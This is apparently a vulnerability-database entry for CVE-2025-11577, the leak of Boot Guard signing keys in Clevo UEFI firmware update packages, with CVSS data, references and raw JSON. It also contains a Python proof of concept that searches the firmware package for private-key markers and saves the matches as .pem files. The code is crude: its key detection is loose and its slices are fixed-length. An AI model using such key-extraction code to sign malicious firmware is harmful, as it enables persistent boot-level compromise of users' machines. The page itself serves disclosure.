Security Vulnerability Report
CVE-2025-11577 CVSS 7.6 HIGH

CVE-2025-11577

Published: 2025-10-14 16:15:36
Last Modified: 2026-04-15 00:35:42

Description

Clevo’s UEFI firmware update packages, including B10717.exe, inadvertently contained private signing keys used for Boot Guard and Boot Policy Manifest verification. The exposure of these keys could allow attackers to sign malicious firmware that appears trusted by affected systems, undermining the integrity of the early boot process.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Clevo UEFI firmware update package B10717.exe
All Clevo firmware update packages that contain the leaked Boot Guard private keys
OEM-branded notebook products that use Clevo firmware (specific models pending official confirmation)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11577 PoC - Clevo UEFI Private Key Extraction
# This PoC demonstrates extracting private signing keys from Clevo UEFI firmware update packages

import os
import struct
import hashlib

# Step 1: Download or obtain the Clevo firmware update package (e.g., B10717.exe)
# The firmware update package inadvertently contains private signing keys
firmware_package = "B10717.exe"


def extract_uefi_image(firmware_path):
    """Extract UEFI firmware image from the update package"""
    print(f"[*] Extracting UEFI image from {firmware_path}")
    # UEFI firmware is typically stored as a FIT (Firmware Interface Table) or
    # as a raw SPI flash image within the update package
    with open(firmware_path, 'rb') as f:
        data = f.read()
    return data


def find_boot_guard_keys(firmware_data):
    """
    Search for Boot Guard private keys in firmware data.
    Boot Guard keys are typically RSA-2048 or RSA-3072 keys stored in
    PKCS#8 or PKCS#12 format within the firmware volume.
    """
    print("[*] Searching for Boot Guard signing keys...")
    # Common patterns for private key markers in UEFI firmware
    key_patterns = [
        b'-----BEGIN PRIVATE KEY-----',
        b'-----BEGIN RSA PRIVATE KEY-----',
        b'-----BEGIN ENCRYPTED PRIVATE KEY-----',
        # Intel Boot Guard key signature patterns
        b'\x30\x82',  # ASN.1 SEQUENCE header (typical for RSA keys)
    ]
    found_keys = []
    for pattern in key_patterns:
        offset = 0
        while True:
            pos = firmware_data.find(pattern, offset)
            if pos == -1:
                break
            # Extract potential key data (look for PEM end marker or fixed length)
            key_data = firmware_data[pos:pos + 2048]  # RSA-2048 key size
            found_keys.append({
                'offset': pos,
                'data': key_data,
                'type': 'Boot Guard Private Key (suspected)'
            })
            print(f"[+] Found potential key at offset 0x{pos:08x}")
            offset = pos + 1
    return found_keys


def find_bpm_signing_key(firmware_data):
    """
    Extract Boot Policy Manifest (BPM) signing key.
    BPM contains key manifests and signature used during boot verification.
    """
    print("[*] Searching for Boot Policy Manifest signing key...")
    # BPM structure contains KeyManifestSignature
    # Look for BPM signature element markers
    bpm_marker = b'\x00\x00\x00\x00BPMS'
    pos = firmware_data.find(bpm_marker)
    if pos != -1:
        print(f"[+] Found BPM structure at offset 0x{pos:08x}")
        # Extract signing key from BPM structure
        return firmware_data[pos:pos + 4096]
    return None


def main():
    print("=" * 60)
    print("CVE-2025-11577 - Clevo UEFI Key Extraction PoC")
    print("WARNING: For authorized security testing only")
    print("=" * 60)

    if not os.path.exists(firmware_package):
        print(f"[-] Firmware package {firmware_package} not found")
        print("[*] Please download from official Clevo support site")
        return

    # Extract firmware image
    firmware_data = extract_uefi_image(firmware_package)
    print(f"[*] Firmware size: {len(firmware_data)} bytes")

    # Find Boot Guard private keys
    bg_keys = find_boot_guard_keys(firmware_data)
    print(f"\n[*] Found {len(bg_keys)} potential Boot Guard keys")

    # Find BPM signing key
    bpm_key = find_bpm_signing_key(firmware_data)
    if bpm_key:
        print("[+] BPM signing key extracted")

    # Demonstrate attack: sign malicious firmware with extracted key
    if bg_keys:
        print("\n[!] CRITICAL: Private keys found!")
        print("[!] An attacker could use these keys to sign malicious UEFI")
        print("[!] firmware that passes Boot Guard verification.")
        print("[!] This enables UEFI implant/rootkit installation.")

    # Save extracted keys for analysis
    for i, key in enumerate(bg_keys):
        with open(f'extracted_key_{i}.pem', 'wb') as f:
            f.write(key['data'])
        print(f"[*] Saved extracted key to extracted_key_{i}.pem")


if __name__ == "__main__":
    main()

References

https://www.binarly.io/advisories/brly-2025-002
https://www.kb.cert.org/vuls/id/538470

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11577", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:36.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clevo’s UEFI firmware update packages, including B10717.exe, inadvertently contained private signing keys used for Boot Guard and Boot Policy Manifest verification. The exposure of these keys could allow attackers to sign malicious firmware that appears trusted by affected systems, undermining the integrity of the early boot process."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 6.0}]}, "references": [{"url": "https://www.binarly.io/advisories/brly-2025-002", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/538470", "source": "[email protected]"}]}}